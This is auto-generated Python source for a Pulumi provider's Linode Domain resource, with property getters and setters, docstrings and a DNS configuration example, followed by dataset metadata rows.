:param pulumi.Input[int] expire_sec: The amount of time in seconds that may pass before this Domain is no longer authoritative. Valid values are 300, 3600, 7200, 14400, 28800, 57600, 86400, 172800, 345600, 604800, 1209600, and 2419200 - any other value will be rounded to the nearest valid value.
:param pulumi.Input[str] group: The group this Domain belongs to. This is for display purposes only.
:param pulumi.Input[Sequence[pulumi.Input[str]]] master_ips: The IP addresses representing the master DNS for this Domain.
:param pulumi.Input[int] refresh_sec: The amount of time in seconds before this Domain should be refreshed. Valid values are 300, 3600, 7200, 14400, 28800, 57600, 86400, 172800, 345600, 604800, 1209600, and 2419200 - any other value will be rounded to the nearest valid value.
:param pulumi.Input[int] retry_sec: The interval, in seconds, at which a failed refresh should be retried. Valid values are 300, 3600, 7200, 14400, 28800, 57600, 86400, 172800, 345600, 604800, 1209600, and 2419200 - any other value will be rounded to the nearest valid value.
:param pulumi.Input[str] soa_email: Start of Authority email address. This is required for master Domains.
:param pulumi.Input[str] status: Used to control whether this Domain is currently being rendered (defaults to "active").
:param pulumi.Input[Sequence[pulumi.Input[str]]] tags: A list of tags applied to this object. Tags are for organizational purposes only.
:param pulumi.Input[int] ttl_sec: 'Time to Live' - the amount of time in seconds that this Domain's records may be cached by resolvers or other domain servers. Valid values are 300, 3600, 7200, 14400, 28800, 57600, 86400, 172800, 345600, 604800, 1209600, and 2419200 - any other value will be rounded to the nearest valid value.
"""
pulumi.set(__self__, "domain", domain)
pulumi.set(__self__, "type", type)
if axfr_ips is not None:
pulumi.set(__self__, "axfr_ips", axfr_ips)
if description is not None:
pulumi.set(__self__, "description", description)
if expire_sec is not None:
pulumi.set(__self__, "expire_sec", expire_sec)
if group is not None:
pulumi.set(__self__, "group", group)
if master_ips is not None:
pulumi.set(__self__, "master_ips", master_ips)
if refresh_sec is not None:
pulumi.set(__self__, "refresh_sec", refresh_sec)
if retry_sec is not None:
pulumi.set(__self__, "retry_sec", retry_sec)
if soa_email is not None:
pulumi.set(__self__, "soa_email", soa_email)
if status is not None:
pulumi.set(__self__, "status", status)
if tags is not None:
pulumi.set(__self__, "tags", tags)
if ttl_sec is not None:
pulumi.set(__self__, "ttl_sec", ttl_sec)
@property
@pulumi.getter
def domain(self) -> pulumi.Input[str]:
"""
The domain this Domain represents. These must be unique in our system; you cannot have two Domains representing the same domain.
"""
return pulumi.get(self, "domain")
@domain.setter
def domain(self, value: pulumi.Input[str]):
pulumi.set(self, "domain", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
If this Domain represents the authoritative source of information for the domain it describes, or if it is a read-only copy of a master (also called a slave).
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter(name="axfrIps")
def axfr_ips(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
The list of IPs that may perform a zone transfer for this Domain. This is potentially dangerous, and should be set to an empty list unless you intend to use it.
"""
return pulumi.get(self, "axfr_ips")
@axfr_ips.setter
def axfr_ips(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "axfr_ips", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
A description for this Domain. This is for display purposes only.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="expireSec")
def expire_sec(self) -> Optional[pulumi.Input[int]]:
"""
The amount of time in seconds that may pass before this Domain is no longer authoritative. Valid values are 300, 3600, 7200, 14400, 28800, 57600, 86400, 172800, 345600, 604800, 1209600, and 2419200 - any other value will be rounded to the nearest valid value.
"""
return pulumi.get(self, "expire_sec")
@expire_sec.setter
def expire_sec(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "expire_sec", value)
@property
@pulumi.getter
def group(self) -> Optional[pulumi.Input[str]]:
"""
The group this Domain belongs to. This is for display purposes only.
"""
return pulumi.get(self, "group")
@group.setter
def group(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "group", value)
@property
@pulumi.getter(name="masterIps")
def master_ips(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
The IP addresses representing the master DNS for this Domain.
"""
return pulumi.get(self, "master_ips")
@master_ips.setter
def master_ips(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "master_ips", value)
@property
@pulumi.getter(name="refreshSec")
def refresh_sec(self) -> Optional[pulumi.Input[int]]:
"""
The amount of time in seconds before this Domain should be refreshed. Valid values are 300, 3600, 7200, 14400, 28800, 57600, 86400, 172800, 345600, 604800, 1209600, and 2419200 - any other value will be rounded to the nearest valid value.
"""
return pulumi.get(self, "refresh_sec")
@refresh_sec.setter
def refresh_sec(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "refresh_sec", value)
@property
@pulumi.getter(name="retrySec")
def retry_sec(self) -> Optional[pulumi.Input[int]]:
"""
The interval, in seconds, at which a failed refresh should be retried. Valid values are 300, 3600, 7200, 14400, 28800, 57600, 86400, 172800, 345600, 604800, 1209600, and 2419200 - any other value will be rounded to the nearest valid value.
"""
return pulumi.get(self, "retry_sec")
@retry_sec.setter
def retry_sec(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "retry_sec", value)
@property
@pulumi.getter(name="soaEmail")
def soa_email(self) -> Optional[pulumi.Input[str]]:
"""
Start of Authority email address. This is required for master Domains.
"""
return pulumi.get(self, "soa_email")
@soa_email.setter
def soa_email(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "soa_email", value)
@property
@pulumi.getter
def status(self) -> Optional[pulumi.Input[str]]:
"""
Used to control whether this Domain is currently being rendered (defaults to "active").
"""
return pulumi.get(self, "status")
@status.setter
def status(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "status", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A list of tags applied to this object. Tags are for organizational purposes only.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
@property
@pulumi.getter(name="ttlSec")
def ttl_sec(self) -> Optional[pulumi.Input[int]]:
"""
'Time to Live' - the amount of time in seconds that this Domain's records may be cached by resolvers or other domain servers. Valid values are 300, 3600, 7200, 14400, 28800, 57600, 86400, 172800, 345600, 604800, 1209600, and 2419200 - any other value will be rounded to the nearest valid value.
"""
return pulumi.get(self, "ttl_sec")
@ttl_sec.setter
def ttl_sec(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "ttl_sec", value)
@pulumi.input_type
class _DomainState:
def __init__(__self__, *,
axfr_ips: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
description: Optional[pulumi.Input[str]] = None,
domain: Optional[pulumi.Input[str]] = None,
expire_sec: Optional[pulumi.Input[int]] = None,
group: Optional[pulumi.Input[str]] = None,
master_ips: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
refresh_sec: Optional[pulumi.Input[int]] = None,
retry_sec: Optional[pulumi.Input[int]] = None,
soa_email: Optional[pulumi.Input[str]] = None,
status: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
ttl_sec: Optional[pulumi.Input[int]] = None,
type: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering Domain resources.
:param pulumi.Input[Sequence[pulumi.Input[str]]] axfr_ips: The list of IPs that may perform a zone transfer for this Domain. This is potentially dangerous, and should be set to an empty list unless you intend to use it.
:param pulumi.Input[str] description: A description for this Domain. This is for display purposes only.
:param pulumi.Input[str] domain: The domain this Domain represents. These must be unique in our system; you cannot have two Domains representing the same domain.
:param pulumi.Input[int] expire_sec: The amount of time in seconds that may pass before this Domain is no longer authoritative. Valid values are 300, 3600, 7200, 14400, 28800, 57600, 86400, 172800, 345600, 604800, 1209600, and 2419200 - any other value will be rounded to the nearest valid value.
:param pulumi.Input[str] group: The group this Domain belongs to. This is for display purposes only.
:param pulumi.Input[Sequence[pulumi.Input[str]]] master_ips: The IP addresses representing the master DNS for this Domain.
:param pulumi.Input[int] refresh_sec: The amount of time in seconds before this Domain should be refreshed. Valid values are 300, 3600, 7200, 14400, 28800, 57600, 86400, 172800, 345600, 604800, 1209600, and 2419200 - any other value will be rounded to the nearest valid value.
:param pulumi.Input[int] retry_sec: The interval, in seconds, at which a failed refresh should be retried. Valid values are 300, 3600, 7200, 14400, 28800, 57600, 86400, 172800, 345600, 604800, 1209600, and 2419200 - any other value will be rounded to the nearest valid value.
:param pulumi.Input[str] soa_email: Start of Authority email address. This is required for master Domains.
:param pulumi.Input[str] status: Used to control whether this Domain is currently being rendered (defaults to "active").
:param pulumi.Input[Sequence[pulumi.Input[str]]] tags: A list of tags applied to this object. Tags are for organizational purposes only.
:param pulumi.Input[int] ttl_sec: 'Time to Live' - the amount of time in seconds that this Domain's records may be cached by resolvers or other domain servers. Valid values are 300, 3600, 7200, 14400, 28800, 57600, 86400, 172800, 345600, 604800, 1209600, and 2419200 - any other value will be rounded to the nearest valid value.
:param pulumi.Input[str] type: If this Domain represents the authoritative source of information for the domain it describes, or if it is a read-only copy of a master (also called a slave).
"""
if axfr_ips is not None:
pulumi.set(__self__, "axfr_ips", axfr_ips)
if description is not None:
pulumi.set(__self__, "description", description)
if domain is not None:
pulumi.set(__self__, "domain", domain)
if expire_sec is not None:
pulumi.set(__self__, "expire_sec", expire_sec)
if group is not None:
pulumi.set(__self__, "group", group)
if master_ips is not None:
pulumi.set(__self__, "master_ips", master_ips)
if refresh_sec is not None:
pulumi.set(__self__, "refresh_sec", refresh_sec)
if retry_sec is not None:
pulumi.set(__self__, "retry_sec", retry_sec)
if soa_email is not None:
pulumi.set(__self__, "soa_email", soa_email)
if status is not None:
pulumi.set(__self__, "status", status)
if tags is not None:
pulumi.set(__self__, "tags", tags)
if ttl_sec is not None:
pulumi.set(__self__, "ttl_sec", ttl_sec)
if type is not None:
pulumi.set(__self__, "type", type)
@property
@pulumi.getter(name="axfrIps")
def axfr_ips(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
The list of IPs that may perform a zone transfer for this Domain. This is potentially dangerous, and should be set to an empty list unless you intend to use it.
"""
return pulumi.get(self, "axfr_ips")
@axfr_ips.setter
def axfr_ips(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "axfr_ips", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
A description for this Domain. This is for display purposes only.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def domain(self) -> Optional[pulumi.Input[str]]:
"""
The domain this Domain represents. These must be unique in our system; you cannot have two Domains representing the same domain.
"""
return pulumi.get(self, "domain")
@domain.setter
def domain(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "domain", value)
@property
@pulumi.getter(name="expireSec")
def expire_sec(self) -> Optional[pulumi.Input[int]]:
"""
The amount of time in seconds that may pass before this Domain is no longer authoritative. Valid values are 300, 3600, 7200, 14400, 28800, 57600, 86400, 172800, 345600, 604800, 1209600, and 2419200 - any other value will be rounded to the nearest valid value.
"""
return pulumi.get(self, "expire_sec")
@expire_sec.setter
def expire_sec(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "expire_sec", value)
@property
@pulumi.getter
def group(self) -> Optional[pulumi.Input[str]]:
"""
The group this Domain belongs to. This is for display purposes only.
"""
return pulumi.get(self, "group")
@group.setter
def group(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "group", value)
@property
@pulumi.getter(name="masterIps")
def master_ips(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
The IP addresses representing the master DNS for this Domain.
"""
return pulumi.get(self, "master_ips")
@master_ips.setter
def master_ips(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "master_ips", value)
@property
@pulumi.getter(name="refreshSec")
def refresh_sec(self) -> Optional[pulumi.Input[int]]:
"""
The amount of time in seconds before this Domain should be refreshed. Valid values are 300, 3600, 7200, 14400, 28800, 57600, 86400, 172800, 345600, 604800, 1209600, and 2419200 - any other value will be rounded to the nearest valid value.
"""
return pulumi.get(self, "refresh_sec")
@refresh_sec.setter
def refresh_sec(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "refresh_sec", value)
@property
@pulumi.getter(name="retrySec")
def retry_sec(self) -> Optional[pulumi.Input[int]]:
"""
The interval, in seconds, at which a failed refresh should be retried. Valid values are 300, 3600, 7200, 14400, 28800, 57600, 86400, 172800, 345600, 604800, 1209600, and 2419200 - any other value will be rounded to the nearest valid value.
"""
return pulumi.get(self, "retry_sec")
@retry_sec.setter
def retry_sec(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "retry_sec", value)
@property
@pulumi.getter(name="soaEmail")
def soa_email(self) -> Optional[pulumi.Input[str]]:
"""
Start of Authority email address. This is required for master Domains.
"""
return pulumi.get(self, "soa_email")
@soa_email.setter
def soa_email(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "soa_email", value)
@property
@pulumi.getter
def status(self) -> Optional[pulumi.Input[str]]:
"""
Used to control whether this Domain is currently being rendered (defaults to "active").
"""
return pulumi.get(self, "status")
@status.setter
def status(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "status", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A list of tags applied to this object. Tags are for organizational purposes only.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
@property
@pulumi.getter(name="ttlSec")
def ttl_sec(self) -> Optional[pulumi.Input[int]]:
"""
'Time to Live' - the amount of time in seconds that this Domain's records may be cached by resolvers or other domain servers. Valid values are 300, 3600, 7200, 14400, 28800, 57600, 86400, 172800, 345600, 604800, 1209600, and 2419200 - any other value will be rounded to the nearest valid value.
"""
return pulumi.get(self, "ttl_sec")
@ttl_sec.setter
def ttl_sec(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "ttl_sec", value)
@property
@pulumi.getter
def type(self) -> Optional[pulumi.Input[str]]:
"""
If this Domain represents the authoritative source of information for the domain it describes, or if it is a read-only copy of a master (also called a slave).
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "type", value)
class Domain(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
axfr_ips: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
description: Optional[pulumi.Input[str]] = None,
domain: Optional[pulumi.Input[str]] = None,
expire_sec: Optional[pulumi.Input[int]] = None,
group: Optional[pulumi.Input[str]] = None,
master_ips: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
refresh_sec: Optional[pulumi.Input[int]] = None,
retry_sec: Optional[pulumi.Input[int]] = None,
soa_email: Optional[pulumi.Input[str]] = None,
status: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
ttl_sec: Optional[pulumi.Input[int]] = None,
type: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Provides a Linode Domain resource. This can be used to create, modify, and delete Linode Domains through Linode's managed DNS service.
For more information, see [DNS Manager](https://www.linode.com/docs/platform/manager/dns-manager/) and the [Linode APIv4 docs](https://developers.linode.com/api/v4#operation/createDomain).
## Example Usage
The following example shows how one might use this resource to configure a Domain Record attached to a Linode Domain.
```python
import pulumi
import pulumi_linode as linode
foobar_domain = linode.Domain("foobarDomain",
type="master",
domain="foobar.example",
soa_email="example@foobar.example",
tags=[
"foo",
"bar",
])
foobar_domain_record = linode.DomainRecord("foobarDomainRecord",
domain_id=foobar_domain.id,
name="www",
record_type="CNAME",
target="foobar.example")
```
## Attributes
This resource exports no additional attributes, however `status` may reflect degraded states.
## Import
Linodes Domains can be imported using the Linode Domain `id`, e.g.
```sh
$ pulumi import linode:index/domain:Domain foobar 1234567
```
The Linode Guide, [Import Existing Infrastructure to Terraform](https://www.linode.com/docs/applications/configuration-management/import-existing-infrastructure-to-terraform/), offers resource importing examples for Domains and other Linode resource types.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[Sequence[pulumi.Input[str]]] axfr_ips: The list of IPs that may perform a zone transfer for this Domain. This is potentially dangerous, and should be set to an empty list unless you intend to use it.
:param pulumi.Input[str] description: A description for this Domain. This is for display purposes only.
:param pulumi.Input[str] domain: The domain this Domain represents. These must be unique in our system; you cannot have two Domains representing the same domain.
:param pulumi.Input[int] expire_sec: The amount of time in seconds that may pass before this Domain is no longer authoritative. Valid values are 300, 3600, 7200, 14400, 28800, 57600, 86400, 172800, 345600, 604800, 1209600, and 2419200 - any other value will be rounded to the nearest valid value.
:param pulumi.Input[str] group: The group this Domain belongs to. This is for display purposes only.
:param pulumi.Input[Sequence[pulumi.Input[str]]] master_ips: The IP addresses representing the master DNS for this Domain.
:param pulumi.Input[int] refresh_sec: The amount of time in seconds before this Domain should be refreshed. Valid values are 300, 3600, 7200, 14400, 28800, 57600, 86400, 172800, 345600, 604800, 1209600, and 2419200 - any other value will be rounded to the nearest valid value.
:param pulumi.Input[int] retry_sec: The interval, in seconds, at which a failed refresh should be retried. Valid values are 300, 3600, 7200, 14400, 28800, 57600, 86400, 172800, 345600, 604800, 1209600, and 2419200 - any other value will be rounded to the nearest valid value.
:param pulumi.Input[str] soa_email: Start of Authority email address. This is required for master Domains.
:param pulumi.Input[str] status: Used to control whether this Domain is currently being rendered (defaults to "active").
:param pulumi.Input[Sequence[pulumi.Input[str]]] tags: A list of tags applied to this object. Tags are for organizational purposes only.
:param pulumi.Input[int] ttl_sec: 'Time to Live' - the amount of time in seconds that this Domain's records may be cached by resolvers or other domain servers. Valid values are 300, 3600, 7200, 14400, 28800, 57600, 86400, 172800, 345600, 604800, 1209600, and 2419200 - any other value will be rounded to the nearest valid value.
:param pulumi.Input[str] type: If this Domain represents the authoritative source of information for the domain it describes, or if it is a read-only copy of a master (also called a slave).
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: DomainArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Provides a Linode Domain resource. This can be used to create, modify, and delete Linode Domains through Linode's managed DNS service.
For more information, see [DNS Manager](https://www.linode.com/docs/platform/manager/dns-manager/) and the [Linode APIv4 docs](https://developers.linode.com/api/v4#operation/createDomain).
## Example Usage
The following example shows how one might use this resource to configure a Domain Record attached to a Linode Domain.
```python
import pulumi
import pulumi_linode as linode
foobar_domain = linode.Domain("foobarDomain",
type="master",
domain="foobar.example",
soa_email="example@foobar.example",
tags=[
"foo",
"bar",
])
foobar_domain_record = linode.DomainRecord("foobarDomainRecord",
domain_id=foobar_domain.id,
name="www",
record_type="CNAME",
target="foobar.example")
```
## Attributes
This resource exports no additional attributes, however `status` may reflect degraded states.
## Import
Linodes Domains can be imported using the Linode Domain `id`, e.g.
```sh
$ pulumi import linode:index/domain:Domain foobar 1234567
```
The Linode Guide, [Import Existing Infrastructure to Terraform](https://www.linode.com/docs/applications/configuration-management/import-existing-infrastructure-to-terraform/), offers resource importing examples for Domains and other Linode resource types.
:param str resource_name: The name of the resource.
:param DomainArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(DomainArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
axfr_ips: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
description: Optional[pulumi.Input[str]] = None,
domain: Optional[pulumi.Input[str]] = None,
expire_sec: Optional[pulumi.Input[int]] = None,
group: Optional[pulumi.Input[str]] = None,
master_ips: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
refresh_sec: Optional[pulumi.Input[int]] = None,
retry_sec: Optional[pulumi.Input[int]] = None,
soa_email: Optional[pulumi.Input[str]] = None,
status: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
ttl_sec: Optional[pulumi.Input[int]] = None,
type: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = DomainArgs.__new__(DomainArgs)
__props__.__dict__["axfr_ips"] = axfr_ips
__props__.__dict__["description"] = description
if domain is None and not opts.urn:
raise TypeError("Missing required property 'domain'")
__props__.__dict__["domain"] = domain
__props__.__dict__["expire_sec"] = expire_sec
__props__.__dict__["group"] = group
__props__.__dict__["master_ips"] = master_ips
__props__.__dict__["refresh_sec"] = refresh_sec
__props__.__dict__["retry_sec"] = retry_sec
__props__.__dict__["soa_email"] = soa_email
__props__.__dict__["status"] = status
__props__.__dict__["tags"] = tags
__props__.__dict__["ttl_sec"] = ttl_sec
if type is None and not opts.urn:
raise TypeError("Missing required property 'type'")
__props__.__dict__["type"] = type
super(Domain, __self__).__init__(
'linode:index/domain:Domain',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
axfr_ips: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
description: Optional[pulumi.Input[str]] = None,
domain: Optional[pulumi.Input[str]] = None,
expire_sec: Optional[pulumi.Input[int]] = None,
group: Optional[pulumi.Input[str]] = None,
master_ips: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
refresh_sec: Optional[pulumi.Input[int]] = None,
retry_sec: Optional[pulumi.Input[int]] = None,
soa_email: Optional[pulumi.Input[str]] = None,
status: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
ttl_sec: Optional[pulumi.Input[int]] = None,
type: Optional[pulumi.Input[str]] = None) -> 'Domain':
"""
Get an existing Domain resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[Sequence[pulumi.Input[str]]] axfr_ips: The list of IPs that may perform a zone transfer for this Domain. This is potentially dangerous, and should be set to an empty list unless you intend to use it.
:param pulumi.Input[str] description: A description for this Domain. This is for display purposes only.
:param pulumi.Input[str] domain: The domain this Domain represents. These must be unique in our system; you cannot have two Domains representing the same domain.
:param pulumi.Input[int] expire_sec: The amount of time in seconds that may pass before this Domain is no longer authoritative. Valid values are 300, 3600, 7200, 14400, 28800, 57600, 86400, 172800, 345600, 604800, 1209600, and 2419200 - any other value will be rounded to the nearest valid value.
:param pulumi.Input[str] group: The group this Domain belongs to. This is for display purposes only.
:param pulumi.Input[Sequence[pulumi.Input[str]]] master_ips: The IP addresses representing the master DNS for this Domain.
:param pulumi.Input[int] refresh_sec: The amount of time in seconds before this Domain should be refreshed. Valid values are 300, 3600, 7200, 14400, 28800, 57600, 86400, 172800, 345600, 604800, 1209600, and 2419200 - any other value will be rounded to the nearest valid value.
:param pulumi.Input[int] retry_sec: The interval, in seconds, at which a failed refresh should be retried. Valid values are 300, 3600, 7200, 14400, 28800, 57600, 86400, 172800, 345600, 604800, 1209600, and 2419200 - any other value will be rounded to the nearest valid value.
:param pulumi.Input[str] soa_email: Start of Authority email address. This is required for master Domains.
:param pulumi.Input[str] status: Used to control whether this Domain is currently being rendered (defaults to "active").
:param pulumi.Input[Sequence[pulumi.Input[str]]] tags: A list of tags applied to this object. Tags are for organizational purposes only.
:param pulumi.Input[int] ttl_sec: 'Time to Live' - the amount of time in seconds that this Domain's records may be cached by resolvers or other domain servers. Valid values are 300, 3600, 7200, 14400, 28800, 57600, 86400, 172800, 345600, 604800, 1209600, and 2419200 - any other value will be rounded to the nearest valid value.
:param pulumi.Input[str] type: If this Domain represents the authoritative source of information for the domain it describes, or if it is a read-only copy of a master (also called a slave).
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _DomainState.__new__(_DomainState)
__props__.__dict__["axfr_ips"] = axfr_ips
__props__.__dict__["description"] = description
__props__.__dict__["domain"] = domain
__props__.__dict__["expire_sec"] = expire_sec
__props__.__dict__["group"] = group
__props__.__dict__["master_ips"] = master_ips
__props__.__dict__["refresh_sec"] = refresh_sec
__props__.__dict__["retry_sec"] = retry_sec
__props__.__dict__["soa_email"] = soa_email
__props__.__dict__["status"] = status
__props__.__dict__["tags"] = tags
__props__.__dict__["ttl_sec"] = ttl_sec
__props__.__dict__["type"] = type
return Domain(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="axfrIps")
def axfr_ips(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
The list of IPs that may perform a zone transfer for this Domain. This is potentially dangerous, and should be set to an empty list unless you intend to use it.
"""
return pulumi.get(self, "axfr_ips")
@property
@pulumi.getter
def description(self) -> pulumi.Output[Optional[str]]:
"""
A description for this Domain. This is for display purposes only.
"""
return pulumi.get(self, "description")
@property
@pulumi.getter
def domain(self) -> pulumi.Output[str]:
"""
The domain this Domain represents. These must be unique in our system; you cannot have two Domains representing the same domain.
"""
return pulumi.get(self, "domain")
@property
@pulumi.getter(name="expireSec")
def expire_sec(self) -> pulumi.Output[Optional[int]]:
"""
The amount of time in seconds that may pass before this Domain is no longer authoritative. Valid values are 300, 3600, 7200, 14400, 28800, 57600, 86400, 172800, 345600, 604800, 1209600, and 2419200 - any other value will be rounded to the nearest valid value.
"""
return pulumi.get(self, "expire_sec")
@property
@pulumi.getter
def group(self) -> pulumi.Output[Optional[str]]:
"""
The group this Domain belongs to. This is for display purposes only.
"""
return pulumi.get(self, "group")
@property
@pulumi.getter(name="masterIps")
def master_ips(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
The IP addresses representing the master DNS for this Domain.
"""
return pulumi.get(self, "master_ips")
@property
@pulumi.getter(name="refreshSec")
def refresh_sec(self) -> pulumi.Output[Optional[int]]:
"""
The amount of time in seconds before this Domain should be refreshed. Valid values are 300, 3600, 7200, 14400, 28800, 57600, 86400, 172800, 345600, 604800, 1209600, and 2419200 - any other value will be rounded to the nearest valid value.
"""
return pulumi.get(self, "refresh_sec")
@property
@pulumi.getter(name="retrySec")
def retry_sec(self) -> pulumi.Output[Optional[int]]:
"""
The interval, in seconds, at which a failed refresh should be retried. Valid values are 300, 3600, 7200, 14400, 28800, 57600, 86400, 172800, 345600, 604800, 1209600, and 2419200 - any other value will be rounded to the nearest valid value.
"""
return pulumi.get(self, "retry_sec")
@property
@pulumi.getter(name="soaEmail")
def soa_email(self) -> pulumi.Output[Optional[str]]:
"""
Start of Authority email address. This is required for master Domains.
"""
return pulumi.get(self, "soa_email")
@property
@pulumi.getter
def status(self) -> pulumi.Output[str]:
"""
Used to control whether this Domain is currently being rendered (defaults to "active").
"""
return pulumi.get(self, "status")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
A list of tags applied to this object. Tags are for organizational purposes only.
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter(name="ttlSec")
def ttl_sec(self) -> pulumi.Output[Optional[int]]:
"""
'Time to Live' - the amount of time in seconds that this Domain's records may be cached by resolvers or other domain servers. Valid values are 300, 3600, 7200, 14400, 28800, 57600, 86400, 172800, 345600, 604800, 1209600, and 2419200 - any other value will be rounded to the nearest valid value.
"""
return pulumi.get(self, "ttl_sec")
@property
@pulumi.getter
def type(self) -> pulumi.Output[str]:
"""
If this Domain represents the authoritative source of information for the domain it describes, or if it is a read-only copy of a master (also called a slave).
"""
return pulumi.get(self, "type")
| 52.191624
| 336
| 0.658229
| 5,398
| 41,127
| 4.88718
| 0.055206
| 0.088397
| 0.063152
| 0.040029
| 0.941359
| 0.929646
| 0.920132
| 0.910125
| 0.904363
| 0.890717
| 0
| 0.057191
| 0.241958
| 41,127
| 787
| 337
| 52.257942
| 0.789004
| 0.468549
| 0
| 0.837156
| 1
| 0
| 0.06742
| 0.001306
| 0
| 0
| 0
| 0
| 0
| 1
| 0.165138
| false
| 0.002294
| 0.011468
| 0
| 0.275229
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
745ec1709a9d2efbfc6eb9fcfddf09019d58ed2c
| 197
|
py
|
Python
|
rabpro/__init__.py
|
jsta/rabpro
|
44301c6a08c14654b27a3475b89898afca0af329
|
[
"BSD-3-Clause"
] | 2
|
2021-12-17T21:23:21.000Z
|
2021-12-19T06:12:28.000Z
|
rabpro/__init__.py
|
jsta/rabpro
|
44301c6a08c14654b27a3475b89898afca0af329
|
[
"BSD-3-Clause"
] | 45
|
2021-08-09T17:00:59.000Z
|
